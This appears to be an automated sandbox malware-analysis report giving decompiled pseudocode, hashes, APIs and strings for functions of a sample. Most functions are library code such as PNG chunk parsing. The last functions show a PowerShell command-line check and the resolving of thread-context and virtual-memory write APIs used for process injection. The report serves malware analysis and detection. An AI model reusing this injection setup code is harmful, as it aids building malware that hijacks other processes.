Opcode Fuzzy Hash: 332121329855a22d200478938ac5d74a1e80f08041f8f988cc4a1a7d80123544
Instruction Fuzzy Hash: E6411F75D100298BCB28CF69CC91BBCB7B2FF94305F1481BDD449AB286CA346A91DF14

Uniqueness

Uniqueness Score: -1,00%

Function 0040B376, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a241ec6f3c41b1a0198110d45ba1e067fc4209cdcae7cea4f8cfdc92391ccec
Instruction ID: edc3611e5d1e7ec1da8d242b6929ef5fd245e43a37587b18809bb632e41d8e22
Opcode Fuzzy Hash: 9a241ec6f3c41b1a0198110d45ba1e067fc4209cdcae7cea4f8cfdc92391ccec
Instruction Fuzzy Hash: 4531D4B59140398BD714CF19CC91B78B7B6FFC4305F0481F9E44AAB296CA356AA4DF14

Uniqueness

Uniqueness Score: -1,00%

Function 00404204, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00404204(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E0040436B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00404425(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00404310(_t55, _t66);
										_t89 = _t66 + 0x10;
										E0040436B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00404407(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00404208
0x00404209
0x0040420a
0x0040420d
0x0040420f
0x00404212
0x00404213
0x00404215
0x00404216
0x00404217
0x0040421a
0x00404224
0x004042d5
0x004042dc
0x004042e5
0x0040422a
0x0040422a
0x00404230
0x00404236
0x00404239
0x0040423c
0x00404240
0x00404245
0x0040424a
0x004042ca
0x00000000
0x0040424c
0x0040424c
0x00404258
0x0040425a
0x004042b5
0x004042b5
0x004042bb
0x00000000
0x0040425c
0x0040426b
0x0040426d
0x0040426e
0x0040426f
0x00404272
0x00404272
0x00404274
0x00000000
0x00404276
0x00404276
0x004042c0
0x00404278
0x00404278
0x0040427c
0x00404284
0x00404289
0x0040428e
0x0040429a
0x004042a2
0x004042a9
0x004042af
0x004042b3
0x00000000
0x004042b3
0x00404276
0x00404274
0x00000000
0x0040425a
0x004042ce
0x004042ce
0x004042ce
0x0040424a
0x004042ea
0x004042f1

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 7d7409ff755457f2641b2632e0f56afe69bfeae2af61b2e4e436f797508f57ef
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: E621B6B2A00204ABCB14DF69C8809A7B7A5FF84354B0685BDEE15AB285D734F915CBE0

Uniqueness

Uniqueness Score: -1,00%

Function 00431860, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 6925159b71c0b95fcc732fc4fb025bb039037422b2db5fae44b7c08466811fa2
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 80112B7760018243E60C9A2DD8B4AB7E795EFCE335F2CA37BD0414B774D22AD945960C

Uniqueness

Uniqueness Score: -1,00%

Function 002C0000, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1499824136.002C0000.00000040.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_rb5iJg6pgN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bb089123758d7bb53d0fbb6d10e3a00f9bd5ad1735afea7a2043ac169e4ada8
Instruction ID: d56c0b7674e2212e23a3d1181dbfb4728b80beb3c2065fdf80272f03c94c3902
Opcode Fuzzy Hash: 4bb089123758d7bb53d0fbb6d10e3a00f9bd5ad1735afea7a2043ac169e4ada8
Instruction Fuzzy Hash: B7E0C278E12208EFCB40DF99D181E9DB7F4BB08300F10816AE804E3701D374A941CF00

Uniqueness

Uniqueness Score: -1,00%

Function 002C04C7, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1499824136.002C0000.00000040.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_rb5iJg6pgN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e17d31665bb9f3d665e14f14c44a707504875abb68226ecb248187ecf86837
Instruction ID: e5985248ad43cdfc9bc380b1bf7e6410ffb49a0e254064c76aae1829ea19d5f0
Opcode Fuzzy Hash: 37e17d31665bb9f3d665e14f14c44a707504875abb68226ecb248187ecf86837
Instruction Fuzzy Hash: 0CE07E78E12208EFCB40DFA9D181E9DBBF5BB08200F504059E804E7711E374A941CF40

Uniqueness

Uniqueness Score: -1,00%

Function 00424B80, Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 285COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00424D09
_memmove.LIBCMT ref: 00424DC1
_memset.LIBCMT ref: 00424E22

Strings

Invalid pCAL equation type, xrefs: 00424BF0
Invalid pCAL parameter count, xrefs: 00424C17
Insufficient memory for pCAL purpose, xrefs: 00424CE1
Invalid format for pCAL parameter, xrefs: 00424C9F
Insufficient memory for pCAL parameter, xrefs: 00424EB2
Insufficient memory for pCAL units, xrefs: 00424D99
Insufficient memory for pCAL params, xrefs: 00424DF5

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _memmove$_memset
String ID: Insufficient memory for pCAL parameter$Insufficient memory for pCAL params$Insufficient memory for pCAL purpose$Insufficient memory for pCAL units$Invalid format for pCAL parameter$Invalid pCAL equation type$Invalid pCAL parameter count
API String ID: 1357608183-1679587341
Opcode ID: 63fcc136f2f571875cb167a23fb103401cfdd177cbdc8f0cbc614225158e6e9a
Instruction ID: 94d21736126deb4e061a3ada23851224d7bfa92e4f12a391bc7799f1ab31e1c5
Opcode Fuzzy Hash: 63fcc136f2f571875cb167a23fb103401cfdd177cbdc8f0cbc614225158e6e9a
Instruction Fuzzy Hash: 72D14D74A00209EFCB14CF98D481BDDBBB1FF89308F55815AE909AB341D739AA85CF94

Uniqueness

Uniqueness Score: -1,00%

Function 00416020, Relevance: 18.0, APIs: 2, Strings: 8, Instructions: 451
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416020(void* __fp0, void* _a4, signed int _a8, signed int _a12) {
				char* _v8;
				signed int _v12;
				char _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v113;
				signed char _v114;
				signed char _v115;
				signed char _v116;
				signed char _v241;
				signed char _v242;
				signed char _v243;
				void _v244;
				char _v1268;
				signed int _v1272;
				signed int _v1276;
				signed int _v1280;
				void* _v1284;
				intOrPtr _t212;
				intOrPtr _t215;
				void* _t218;
				signed int _t228;
				signed int _t242;
				signed int _t245;
				void* _t252;
				signed int _t260;
				intOrPtr _t273;
				intOrPtr _t278;
				signed int _t279;
				intOrPtr _t286;
				intOrPtr _t287;
				intOrPtr _t313;
				intOrPtr _t364;
				signed int _t404;
				void* _t425;
				void* _t426;
				void* _t442;

				_t442 = __fp0;
				_v8 = 0;
				_v12 = 0;
				if(( *(_a4 + 0x74) & 0x00000001) != 0) {
					_t212 = _a4;
					__eflags =  *(_t212 + 0x74) & 0x00000006;
					if(( *(_t212 + 0x74) & 0x00000006) == 0) {
						goto L4;
					}
					E00415260(_a4, _a12);
					return E0041B9A0(_a4, "out of place");
				} else {
					E0041B780(_a4, "missing IHDR");
					L4:
					if(_a12 >= 0xe) {
						_t364 = _a4;
						__eflags =  *(_t364 + 0x30e) & 0x8000;
						if(( *(_t364 + 0x30e) & 0x8000) == 0) {
							_t215 = _a4;
							__eflags =  *(_t215 + 0x30e) & 4;
							if(( *(_t215 + 0x30e) & 4) != 0) {
								_v8 = "too many profiles";
								L59:
								__eflags = _v12;
								if(_v12 == 0) {
									E00415260(_a4, _a12);
									_t426 = _t426 + 8;
								}
								 *(_a4 + 0x30e) =  *(_a4 + 0x30e) & 0x0000ffff | 0x00008000;
								_t218 = E0040F700(_a8, _a4, _a8);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t218;
								} else {
									return E0041B9A0(_a4, _v8);
								}
							}
							_v108 = 0x51;
							__eflags = _v108 - _a12;
							if(_v108 > _a12) {
								_v108 = _a12;
							}
							E00415220(_a4, _a4,  &_v100, _v108);
							_t426 = _t426 + 0xc;
							_a12 = _a12 - _v108;
							__eflags = _a12 - 0xb;
							if(_a12 >= 0xb) {
								_v104 = 0;
								while(1) {
									__eflags = _v104 - 0x50;
									if(_v104 >= 0x50) {
										break;
									}
									__eflags = _v104 - _v108;
									if(_v104 >= _v108) {
										break;
									}
									_t287 = _v104;
									__eflags =  *((char*)(_t425 + _t287 - 0x60));
									if( *((char*)(_t425 + _t287 - 0x60)) == 0) {
										break;
									}
									_v104 = _v104 + 1;
								}
								__eflags = _v104 - 1;
								if(_v104 < 1) {
									L56:
									_v8 = "bad keyword";
									L57:
									goto L59;
								}
								__eflags = _v104 - 0x4f;
								if(_v104 > 0x4f) {
									goto L56;
								}
								__eflags = _v104 + 1 - _v108;
								if(_v104 + 1 >= _v108) {
									L54:
									_v8 = "bad compression method";
									L55:
									goto L57;
								}
								_t313 = _v104;
								__eflags =  *((char*)(_t425 + _t313 - 0x5f));
								if( *((char*)(_t425 + _t313 - 0x5f)) != 0) {
									goto L54;
								}
								_v108 = _v108 - _v104 + 2;
								_t228 = E00416750(_a4, 0x69434350);
								_t426 = _t426 + 8;
								__eflags = _t228;
								if(_t228 != 0) {
									_v8 =  *((intOrPtr*)(_a4 + 0x9c));
									L53:
									goto L55;
								}
								_v244 = 0;
								E004345E0( &_v243, 0, 0x83);
								_v1272 = 0x84;
								 *((intOrPtr*)(_a4 + 0x84)) = _t425 + _v104 - 0x5e;
								 *((intOrPtr*)(_a4 + 0x88)) = _v108;
								E004168D0(_a4,  &_v1268, 0x400,  &_a12,  &_v244,  &_v1272, 0);
								_t426 = _t426 + 0x28;
								__eflags = _v1272;
								if(_v1272 != 0) {
									_v8 =  *((intOrPtr*)(_a4 + 0x9c));
									L51:
									 *((intOrPtr*)(_a4 + 0x80)) = 0;
									goto L53;
								}
								_v1276 = ((_v244 & 0x000000ff) << 0x18) + ((_v243 & 0x000000ff) << 0x10) + ((_v242 & 0x000000ff) << 8) + (_v241 & 0x000000ff);
								_t242 = E00410610(_a4, _a4 + 0x2c4,  &_v100, _v1276);
								_t426 = _t426 + 0x10;
								__eflags = _t242;
								if(_t242 == 0) {
									L49:
									goto L51;
								}
								_t245 = E004106C0(_a4, _a4 + 0x2c4,  &_v100, _v1276,  &_v244,  *(_a4 + 0x14f) & 0x000000ff);
								_t426 = _t426 + 0x18;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L49;
								}
								_v1280 = ((_v116 & 0x000000ff) << 0x18) + ((_v115 & 0x000000ff) << 0x10) + ((_v114 & 0x000000ff) << 8) + (_v113 & 0x000000ff);
								_t252 = E00416660(_v113 & 0x000000ff, _a4, _v1276, 2);
								_t426 = _t426 + 0xc;
								_v1284 = _t252;
								__eflags = _v1284;
								if(_v1284 == 0) {
									_v8 = "out of memory";
									goto L49;
								}
								memcpy(_v1284,  &_v244, 0x21 << 2);
								_v1272 = _v1280 * 0xc;
								E004168D0(_a4,  &_v1268, 0x400,  &_a12, _v1284 + 0x84,  &_v1272, 0);
								_t426 = _t426 + 0x28;
								__eflags = _v1272;
								if(_v1272 != 0) {
									_v8 =  *((intOrPtr*)(_a4 + 0x9c));
									L47:
									goto L49;
								}
								_t260 = L00410B10(_a4, _a4 + 0x2c4,  &_v100, _v1276, _v1284);
								_t426 = _t426 + 0x14;
								__eflags = _t260;
								if(_t260 == 0) {
									L45:
									goto L47;
								}
								_v1272 = _v1276 - 0x84 - _v1280 * 0xc;
								_t121 = 0x84 + _v1280 * 0xc; // 0x84
								E004168D0(_a4,  &_v1268, 0x400,  &_a12, _v1284 + _t121,  &_v1272, 1);
								_t426 = _t426 + 0x1c;
								__eflags = _a12;
								if(_a12 <= 0) {
									L32:
									__eflags = _v1272;
									if(_v1272 != 0) {
										L43:
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 =  *((intOrPtr*)(_a4 + 0x9c));
										}
										goto L45;
									}
									__eflags = _a12;
									if(_a12 > 0) {
										E0041B950(_a4, "extra compressed data");
										_t426 = _t426 + 8;
									}
									E00415260(_a4, _a12);
									_v12 = 1;
									_t272 = L00410C70(__eflags, _t442, _a4, _a4 + 0x2c4, _v1284,  *((intOrPtr*)(_a4 + 0xb4)));
									_t426 = _t426 + 0x18;
									__eflags = _a8;
									if(_a8 != 0) {
										L0040EC10(_t272, _a4, _a8, 0x10, 0);
										_t278 = E00424430(_a4, _v104 + 1);
										_t426 = _t426 + 0x18;
										 *((intOrPtr*)(_a8 + 0x74)) = _t278;
										_t279 = _a8;
										__eflags =  *(_t279 + 0x74);
										if( *(_t279 + 0x74) == 0) {
											_t404 =  *(_a4 + 0x30e) & 0x0000ffff | 0x00008000;
											__eflags = _t404;
											_t272 = _a4;
											 *(_a4 + 0x30e) = _t404;
											_v8 = "out of memory";
										} else {
											L00433F90( *((intOrPtr*)(_a8 + 0x74)),  &_v100, _v104 + 1);
											_t426 = _t426 + 0xc;
											 *((intOrPtr*)(_a8 + 0x7c)) = _v1276;
											 *(_a8 + 0x78) = _v1284;
											 *((intOrPtr*)(_a4 + 0x2a0)) = 0;
											 *(_a8 + 0xf4) =  *(_a8 + 0xf4) | 0x00000010;
											_t272 = _a8;
											 *(_a8 + 8) =  *(_a8 + 8) | 0x00001000;
										}
									}
									__eflags = _a8;
									if(_a8 != 0) {
										E0040F700(_t272, _a4, _a8);
										_t426 = _t426 + 8;
									}
									__eflags = _v8;
									if(_v8 != 0) {
										goto L43;
									} else {
										_t273 = _a4;
										 *((intOrPtr*)(_t273 + 0x80)) = 0;
										return _t273;
									}
								}
								_t286 = _a4;
								__eflags =  *(_t286 + 0x78) & 0x00100000;
								if(( *(_t286 + 0x78) & 0x00100000) != 0) {
									goto L32;
								}
								_v8 = "extra compressed data";
								goto L43;
							} else {
								E00415260(_a4, _a12);
								return E0041B9A0(_a4, "too short");
							}
						}
						return E00415260(_a4, _a12);
					}
					E00415260(_a4, _a12);
					return E0041B9A0(_a4, "too short");
				}
			}

0x00416020
0x0041602b
0x00416032
0x00416042
0x00416054
0x0041605a
0x0041605d
0x00000000
0x00000000
0x00416067
0x00000000
0x00416044
0x0041604d
0x00416085
0x00416089
0x004160b1
0x004160bb
0x004160c0
0x004160d7
0x004160e1
0x004160e4
0x004165f2
0x004165f9
0x004165f9
0x004165fd
0x00416607
0x0041660c
0x0041660c
0x00416622
0x00416631
0x00416639
0x0041663d
0x00416654
0x0041663f
0x00000000
0x0041664c
0x0041663d
0x004160ea
0x004160f4
0x004160f7
0x004160fc
0x004160fc
0x0041610b
0x00416110
0x00416119
0x0041611c
0x00416120
0x00416148
0x0041614f
0x0041614f
0x00416153
0x00000000
0x00000000
0x00416158
0x0041615b
0x00000000
0x00000000
0x0041615d
0x00416165
0x00416167
0x00000000
0x00000000
0x0041616f
0x0041616f
0x00416174
0x00416178
0x004165e9
0x004165e9
0x004165f0
0x00000000
0x004165f0
0x0041617e
0x00416182
0x00000000
0x00000000
0x0041618e
0x00416191
0x004165e0
0x004165e0
0x004165e7
0x00000000
0x004165e7
0x00416197
0x0041619f
0x004161a1
0x00000000
0x00000000
0x004161b2
0x004161be
0x004161c3
0x004161c6
0x004161c8
0x004165db
0x004165de
0x00000000
0x004165de
0x004161ce
0x004161e3
0x004161eb
0x004161ff
0x0041620b
0x00416235
0x0041623a
0x0041623d
0x00416244
0x004165c0
0x004165c3
0x004165c6
0x00000000
0x004165c6
0x00416275
0x00416293
0x00416298
0x0041629b
0x0041629d
0x004165b5
0x00000000
0x004165b5
0x004162ce
0x004162d3
0x004162d6
0x004162d8
0x00000000
0x00000000
0x004162fd
0x00416310
0x00416315
0x00416318
0x0041631e
0x00416325
0x004165ae
0x00000000
0x004165ae
0x0041633c
0x00416347
0x00416376
0x0041637b
0x0041637e
0x00416385
0x004165a9
0x004165ac
0x00000000
0x004165ac
0x004163ab
0x004163b0
0x004163b3
0x004163b5
0x0041659e
0x00000000
0x0041659e
0x004163d1
0x004163ef
0x0041640b
0x00416410
0x00416413
0x00416417
0x00416433
0x00416433
0x0041643a
0x0041658c
0x0041658c
0x00416590
0x0041659b
0x0041659b
0x00000000
0x00416590
0x00416440
0x00416444
0x0041644f
0x00416454
0x00416454
0x0041645f
0x00416467
0x0041648d
0x00416492
0x00416495
0x00416499
0x004164ab
0x004164be
0x004164c3
0x004164c9
0x004164cc
0x004164cf
0x004164d3
0x00416547
0x00416547
0x0041654d
0x00416550
0x00416557
0x004164d5
0x004164e7
0x004164ec
0x004164f8
0x00416504
0x0041650a
0x00416523
0x00416535
0x00416538
0x00416538
0x004164d3
0x0041655e
0x00416562
0x0041656c
0x00416571
0x00416571
0x00416574
0x00416578
0x00000000
0x0041657a
0x0041657a
0x0041657d
0x00000000
0x0041657d
0x00416578
0x00416419
0x0041641f
0x00416425
0x00000000
0x00000000
0x00416427
0x00000000
0x00416122
0x0041612a
0x00000000
0x00416140
0x00416120
0x00000000
0x004160cf
0x00416093
0x00000000
0x004160a9

Strings

out of memory, xrefs: 00416557, 004165AE
too many profiles, xrefs: 004165F2
missing IHDR, xrefs: 00416044
out of place, xrefs: 0041606F
Q, xrefs: 004160EA
too short, xrefs: 0041609B, 00416132
extra compressed data, xrefs: 00416427, 00416446
O, xrefs: 0041617E

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID: O$Q$extra compressed data$missing IHDR$out of memory$out of place$too many profiles$too short
API String ID: 0-936519238
Opcode ID: 0497b1b120691f23234d956ca22b366952cac7006d97651467f49c57de9fbf99
Instruction ID: c4c15b4544f3e02fec7d6a868208fbad69a8595ec6ea22a5d41172c7ace66c91
Opcode Fuzzy Hash: 0497b1b120691f23234d956ca22b366952cac7006d97651467f49c57de9fbf99
Instruction Fuzzy Hash: F2126FB5900209EBDB14CF54D894BEE77B5BF88304F1481AAF9099B346D738DA85CF98

Uniqueness

Uniqueness Score: -1,00%

Function 00401922, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401922(void* __eax, void* __eflags) {
				signed int _v4;
				void* __ecx;
				void* _t20;
				void* _t26;
				intOrPtr _t40;
				long _t41;
				void* _t42;
				void* _t47;
				void** _t48;
				void* _t49;

				_v4 = _v4 & 0x00000000;
				_t40 =  *0x406474; // 0x1b989e0
				_t48 = __eax;
				memset(__eax, 0, 0x220);
				_t20 = E00401F75(GetCommandLineW(), "powershell.exe");
				_t54 = _t20;
				if(_t20 == 0) {
					E00401F4B(_t40,  &(_t48[6]));
					_t41 = 0;
					__eflags = 0;
					L5:
					if(E0040180F(_t42, _t55, ?str?, _t48,  &(_t48[4])) != 0) {
						_t57 =  *0x406464 & 0x00000001;
						if(( *0x406464 & 0x00000001) == 0 || E0040180F(_t42, _t57, ?str?,  &(_t48[2]),  &(_t48[5])) != 0) {
							_t26 =  *_t48;
							 *_t26 = _t41;
							 *(_t26 +  *((intOrPtr*)(_t26 + 0x3c))) = _t41;
							__eflags = _t48[2] | _t48[3];
							if((_t48[2] | _t48[3]) != 0) {
								_t49 = _t48[2];
								 *_t49 = _t41;
								 *(_t49 +  *((intOrPtr*)(_t49 + 0x3c))) = _t41;
							}
							_v4 = 1;
						} else {
							HeapFree( *0x406458, _t41,  *_t48);
						}
					}
					return _v4;
				}
				_t47 = E00401894(GetCommandLineW(), _t54);
				_t41 = 0;
				_t55 = _t47;
				if(_t47 == 0) {
					SetLastError(0x315);
					return 0;
				}
				E00401F4B(_t47,  &(_t48[6]));
				HeapFree( *0x406458, 0, _t47);
				goto L5;
			}

0x00401923
0x00401928
0x00401936
0x0040193b
0x00401951
0x00401956
0x0040195e
0x0040199b
0x004019a0
0x004019a0
0x004019a2
0x004019b3
0x004019b5
0x004019bc
0x004019e1
0x004019e6
0x004019e8
0x004019ee
0x004019f1
0x004019f3
0x004019f9
0x004019fb
0x004019fb
0x004019fe
0x004019d4
0x004019dd
0x004019dd
0x004019bc
0x00000000
0x00401a06
0x00401967
0x00401969
0x0040196b
0x0040196d
0x0040198b
0x00000000
0x00401991
0x00401975
0x00401982
0x00000000

APIs

memset.NTDLL ref: 0040193B
GetCommandLineW.KERNEL32(powershell.exe), ref: 0040194E
GetCommandLineW.KERNEL32(00000000), ref: 00401960
HeapFree.KERNEL32(00000000,00000000,?), ref: 00401982
SetLastError.KERNEL32(00000315), ref: 0040198B
HeapFree.KERNEL32(00000000,?,R64), ref: 004019DD

Strings

powershell.exe, xrefs: 00401949
R32, xrefs: 004019A7
R64, xrefs: 004019C6

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: CommandFreeHeapLine$ErrorLastmemset
String ID: R32$R64$powershell.exe
API String ID: 3630573334-835855836
Opcode ID: 93cf9e281133f90bdbfa1457835ae4b837ff243572e60ebc928d61bc7b503b6a
Instruction ID: a2f9bf8df70cb077c83898db2eb4314696390eefe409e31316191fd2cd5c505f
Opcode Fuzzy Hash: 93cf9e281133f90bdbfa1457835ae4b837ff243572e60ebc928d61bc7b503b6a
Instruction Fuzzy Hash: 7C219171200744AFD721EF66CD81E67B7E9EF44304B11483EE545E72A1D738E845CB69

Uniqueness

Uniqueness Score: -1,00%

Function 00402505, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00402505(signed int __edx) {
				void _v288;
				char _v292;
				void* __esi;
				void* __ebp;
				signed int _t5;
				int _t6;
				signed int _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				void* _t18;
				void* _t19;
				signed int _t20;
				void* _t21;
				signed int _t22;
				void* _t24;

				_t20 = __edx;
				_t5 =  *0x406490; // 0x0
				_t6 = _t5 |  *0x406494;
				_push(_t22);
				if(_t6 == 0) {
					memset( &_v288, _t6, 0x118);
					_v292 = 0x11c;
					__imp__RtlGetVersion( &_v292);
					_t29 = _v288 - 0xa;
					if(_v288 < 0xa) {
						_t24 = _t22 | 0xffffffff;
						__eflags = _t24;
					} else {
						_t24 = OpenProcess(0x410, 0, GetCurrentProcessId());
					}
					_push("ZwGetContextThread");
					_push(_t24);
					_t11 = E004029F8(_t18, _t19, _t21, _t24, _t29);
					_push("ZwSetContextThread");
					_push(_t24);
					 *0x406490 = _t11;
					 *0x406494 = _t20;
					_t12 = E004029F8(_t18, _t19, _t21, _t24, _t29);
					_push("ZwProtectVirtualMemory");
					_push(_t24);
					 *0x406498 = _t12;
					 *0x40649c = _t20;
					_t13 = E004029F8(_t18, _t19, _t21, _t24, _t29);
					_push("ZwWriteVirtualMemory");
					_push(_t24);
					 *0x4064a0 = _t13;
					 *0x4064a4 = _t20;
					 *0x4064a8 = E004029F8(_t18, _t19, _t21, _t24, _t29);
					 *0x4064ac = _t20;
					if(_t24 != 0xffffffff) {
						CloseHandle(_t24);
					}
				}
				return 0x406490;
			}

0x00402505
0x00402508
0x00402513
0x00402519
0x0040251a
0x0040252d
0x0040253c
0x00402546
0x0040254c
0x00402553
0x0040256d
0x0040256d
0x00402555
0x00402569
0x00402569
0x00402570
0x00402575
0x00402576
0x0040257b
0x00402580
0x00402581
0x00402586
0x0040258c
0x00402591
0x00402596
0x00402597
0x0040259c
0x004025a2
0x004025a7
0x004025ac
0x004025ad
0x004025b2
0x004025c0
0x004025c5
0x004025cb
0x004025ce
0x004025ce
0x004025cb
0x004025db

APIs

memset.NTDLL ref: 0040252D
RtlGetVersion.NTDLL(?), ref: 00402546
GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 00402555
OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000), ref: 00402563
CloseHandle.KERNEL32(00000000), ref: 004025CE

Strings

ZwSetContextThread, xrefs: 0040257B
ZwWriteVirtualMemory, xrefs: 004025A7
ZwProtectVirtualMemory, xrefs: 00402591
ZwGetContextThread, xrefs: 00402570

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentHandleOpenVersionmemset
String ID: ZwGetContextThread$ZwProtectVirtualMemory$ZwSetContextThread$ZwWriteVirtualMemory
API String ID: 3667074770-3123182969
